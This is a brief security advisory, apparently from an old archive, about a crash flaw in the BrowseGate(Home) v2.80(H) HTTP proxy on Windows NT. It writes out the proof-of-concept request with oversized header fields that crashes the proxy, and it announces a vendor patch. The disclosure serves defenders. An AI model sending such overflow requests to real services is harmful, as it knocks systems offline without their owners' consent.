Vulnerability

    BrowseGate(Home)

Affected

    BrowseGate(Home) v2.80(H)

Description

    Following is  based on  a Delphis  Consulting DST2K0031  Advisory.
    They discovered  the following  vulnerability in  Browsegate under
    Windows NT.

    It is possible to cause  Browsegate to crash with an  invalid read
    error.  This is done by connecting to port 80 upon which the  HTTP
    proxy listens on and sending the following:

        GET / HTTP/1.0<cr>
        Authorization: Basic(A x 8k)<cr>
        From: dcist@delphisplc.com<cr>
        If-Modified-Since: Sat, 29 Oct 1994 19:43:31 GMT<cr>
        Referer: http://www.delphisplc.com/(A x 8k)<cr>
        UserAgent: DCIST Browser 1.1<cr>
        <cr><cr>

    This will cause an error brwgate.exe to crash with it's own  error
    handler twice complaining that memory can not be written or read.

Solution

    Delphis have worked with NetCPlus  to resolve the above issue  and
    are happy  to announce  that a  patch is  availible from their web
    site (Version: v2.80.001):

        http://www.netcplus.com

    Delphis would like  to take this  oppertunity to thank  Ian Turner
    and the developers at Netcplus at the speed they responded.